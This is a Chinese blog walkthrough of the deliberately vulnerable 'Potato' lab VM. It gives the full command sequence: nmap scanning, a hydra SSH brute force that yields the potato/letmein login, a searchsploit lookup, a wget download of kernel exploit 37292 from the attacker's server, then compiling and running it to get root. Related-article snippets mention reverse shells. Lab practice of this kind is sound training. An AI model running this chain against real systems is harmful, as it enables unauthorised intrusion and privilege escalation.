Potato靶机测试

最新推荐文章于 2024-05-14 00:05:25 发布
最新推荐文章于 2024-05-14 00:05:25 发布
阅读量1.5k 收藏 3
点赞数
文章标签: 安全性测试 系统安全 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56375711/article/details/126449453
版权

一、设备扫描

nmap -sP 192.168.119.128/24        --------------扫描此网段存活的设备

发现目标靶机的ip可能为192.168.119.130

 

 

二、全面扫描靶机

nmap -A 192.168.119.130 -p- -oN nmap192.168.119.130

发现其开着80端口的HTTP服务和7120端口的SSH服务

 

 

 三、针对HTTP服务收集网站信息

发现隐藏目录/info.php

访问192.168.119.130/info.php发现只有php的版本信息,没有可以利用的注入点

所以放弃对HTTP服务的攻击,转为对SSH服务进行研究。

 

 

 

 

四、hydra爆破SSH

hydra 192.168.119.130 ssh -L username.txt -P password.txt -s 7120 -f

得到     账号:potato   密码:letmein

五、使用ssh链接靶机

ssh potato@192.168.119.130 -p 7120

 

 

六、信息分析

登录后发现目录下并没有什么有用的东西

id查看发现是一个普通用户

uname -a查看发现ubuntu的版本很老,只有3.13.0

下一步针对ubuntu版本查找漏洞

 

七、 查找漏洞

serchsploit ubuntu 3.13.3

使用第一个漏洞进行攻击

 

八、使用漏洞 

现在已经得知靶机存在以下漏洞,下一步想法是将漏洞传到靶机上,这里我们在kali上建立apache服务器,让目标主机通过网络将漏洞下载到本机上

service apache2 start   ---------开启服务器

ss -tunlp                       ----------查看开启端口

 

 将漏洞下载到服务器目录下

cd /var/www/html

searchsploit -m 37292 

 

九、使用目标靶机下载服务器上的漏洞

wget http://192.168.119.128/37292.c 

 

十、运行脚本提权

gcc 37292.c -o exp ----------编译脚本

chmod +777 exp -----------更改权限

./exp -------------执行脚本

 

 成功拿到root权限,攻击成功!

m0_56375711
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
potato-suncsr靶机详解
weixin_44681307的博客
07-10 518
登陆上以后发现就一个大土豆,扫描了一下目录就扫到一个phpinfo页面,也没什么用,这个网页标题是个potato,就想着爆破一下密码,结果很快就出来了个密码。ssh登陆一下,这个靶场里面依然搜索不到什么可用的东西,sudo -l 或者 查找有root权限的文件都没有可用的。首先扫描靶机ip地址,找到以后我又对靶机进行了一个全端口扫描,发现它的ssh端口号是7120.这个靶机说是一个简单偏难的,但是我觉得这个靶机是我做过最简单的一个。发现还不少,我就直接用了第一个。简单的不能再简单的一个靶场。
OSCP Potato靶机 超详细教学
m0_52545432的博客
05-06 361
nmap直接开扫-p- 全端口扫描-A 表示 aggressive,可以理解为全面扫描80 http协议22 ssh协议2112 FTP协议2112放了一个FTP,可以通过默认的用户名登录进去,用户名为anonymous 密码随便填由于不是默认的端口,所以ftp登录时需要指定一下端口,命令为230说明匿名登录成功binary 以二进制模式传输文件,保证文件完整get命令下载文件到桌面一段php代码,应该是登录页面的备份,固定了用户名是admin另外一个文件是。
VulnHub靶机 DC-7 打靶 渗透详细流程
rumil的博客
04-22 898
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
软件测试最新看完这篇 教你玩转渗透测试靶机vulnhub——HackNos-2(1),2024年最新跳槽薪资翻倍
最新发布
asdakdnfh的博客
05-14 301
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。
靶机测试-bulldog
ximo的博客
02-27 356
测试步骤信息收集主机发现端口及其服务扫描目录扫描测试对应端口服务测试后台目录寻找漏洞:反弹shell因为知道网站的编程语言是python,所以可以通过python进行反弹shell:提权 信息收集 主机发现 kali IP地址查询,确认靶机存在网段 使用nmap进行主机发现: namp -sP 192.168.31.0/24 端口及其服务扫描 nmap -sV -O 192.168.31.181 发现开放了23,80,8080端口及其服务 访问其80及8080端口(因为此端口开放了http服
靶机potato-suncsr)——ssh暴力破解(工具包括:cewl(爬虫)、hydra(九头蛇)、nmap、arp-scan、dirsearch)
一大口木的博客
04-11 2117
第一次使用靶机,很好玩,我感觉靶机就是有漏洞的一个虚拟机,你可以在vmware里打开,然后用kali攻击,获取权限,或者盗取信息链接: https://pan.baidu.com/s/1KFYQkEP_KAr3lJZOfQ2-Ig?pwd=2cbh 提取码: 2cbh 复制这段内容后打开百度网盘手机App,操作更方便哦开始正题。
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
potato
03-16
标题“potato”可能指的是一个Python项目或库,因为给定的标签是“Python”。在Python编程中,"potato"可能是一个模块、脚本或者一个应用的名称。描述中的内容“土豆”在中文里恰好也是“potato”的直译,这可能是...
potatoInstaller.exe potato potatochat
03-03
potatoInstaller.exe potato potatochat
Seed Potato Technology
05-13
The potato is one of the most important food crops in the world. This statement can be illustrated by the following facts. First of all, the potato crop is grown on a significant scale in more than ...
POTATO
03-31
土豆来自波旁战争成员的令人满意的mod特征: 为我们的任务框架提供支持加载量BFT标记观众ACRE无线电配置管理员工具针对我们社区的游戏性调整执照 该项目是完全开源的,欢迎所有贡献。 只要您所做的更改根据GNU通用...
Potato_Desktop
09-20
Potato_Desktop 国外聊天软件
随机账号密码生成工具F版.
05-20
随机账号密码生成
Vulnhub-potato靶机实战
千寻的博客
01-12 886
文章目录学习笔记下载靶机下载第一部分 信息收集第一步 主机发现第二步 端口扫描第三步 访问网站第四步 扫描目录第四步 访问扫描出的目录第五步 回到开放的端口,分析,发现7120开放第二部分 ssh利用使用Hydra破解ssh第三部分 提权第一步 查看基本的系统信息第二步 利用MSF查找可利用的漏洞第三步 将文件上传到靶机第四步 查找flag摘抄 学习笔记下载 https://download.csdn.net/download/qq_41901122/14122921 靶机下载 https://www.
searchsploit使用
热门推荐
qq_38243607的博客
07-05 1万+
“searchsploit”是一个用于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。 Exploit-DB是一个漏洞库,Kali Linux中保存了一个该漏洞库的拷贝,利用上面提到的命令就可以查找需要的渗透模块,它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的,在没有网络的情况下也可以使用。 基本搜索方法就是searchsploit+可能包含漏洞的软件/系统等等,对应回显存在的漏洞和用于渗透的脚本。 参数 直接输入searchspliot可以看到该命令相关的参数:
DC-6靶机测试渗透详细教程
wwxxss
10-26 1285
DC-6的靶场详细渗透过程
Vulnhub靶机实战-POTATO-WP
黑白的博客
01-18 694
声明 好好学习,天天向上 搭建 virtualbox打开,网络和攻击机一样,要么都用桥接要么都用NAT 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.66 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22,2122 访问80 http://192.168.31.66 扫描目录 python3 dirsearch.py -u 192.168.31.66 挨个试一试,发现 /admin需要密码 /admin/logs
看完这篇 教你玩转渗透测试靶机vulnhub——hackableII
Aluxian_的博客
10-07 1278
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。这个靶机很简单就一个提权是新知识点 别的信息收集,FTP匿名,回弹shell md5解码都是之前做过的!
白菜新手渗透测试靶机练习bulldog1
weixin_43912601的博客
09-01 588
步骤 1.信息收集:ip 端口 服务 操作系统 版本 2.漏洞扫描或漏洞发现:eg:ms17-010 3.漏洞利用:拿到shell 4.提权 5.留后门,清痕迹 6.渗透测试报告 主机发现: dhclient 动态获取ip netdiscover -i eth0 -r 192.168.68.0/24 nmap 192.168.68.0/24 -sn nmap -T4 -sV -O -p 80,2...
potato.apk
10-15
Potato.apk是一个应用程序文件。APK是Android应用程序的扩展名。Potato.apk可以是一个由开发者创建的基于Android系统的应用程序。 这个应用程序可能与土豆有关,但无法准确确定它的功能。它可能是一个提供有关土豆种植、烹饪或健康食谱的应用程序。用户可能可以通过Potato.apk了解如何选择、储存和烹饪土豆。这个应用程序可能包括有关土豆的营养成分、健康益处和菜谱建议的信息。 Potato.apk也可能是一个游戏应用程序,与土豆有关。它可能是一个与土豆相关的益智游戏或模拟游戏,让玩家体验种植土豆或制作土豆菜肴的过程。这个应用程序可能包括有关土豆的小知识、种植技巧和快乐的游戏挑战。 无论Potato.apk是一个有关土豆的教育应用程序还是一个娱乐游戏,它提供了一种与土豆有关的互动体验。用户可以通过这个应用程序了解土豆的信息、学习如何种植土豆或享受与土豆有关的游戏。无论用户是土豆爱好者、厨师还是农场主,Potato.apk可能提供了一个有趣和有用的应用程序来满足他们的需求和兴趣。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值